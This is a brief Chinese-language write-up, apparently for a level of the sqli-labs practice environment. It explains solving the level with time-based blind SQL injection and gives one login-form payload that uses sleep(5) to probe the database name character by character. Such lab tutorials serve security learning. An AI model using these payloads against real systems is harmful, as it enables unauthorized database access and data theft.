标签:
本关我们的处理方法和less15是一样的,同样的使用延时注入的方法进行解决。这里直接从源代码中看到对id进行 ("id")的处理。(请自行测试)
提交的payload:
uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
正确的时候可以直接登录,不正确的时候延时5秒。
其他的payload自行构造。
标签:
原文地址:http://www.cnblogs.com/lcamry/p/5763050.html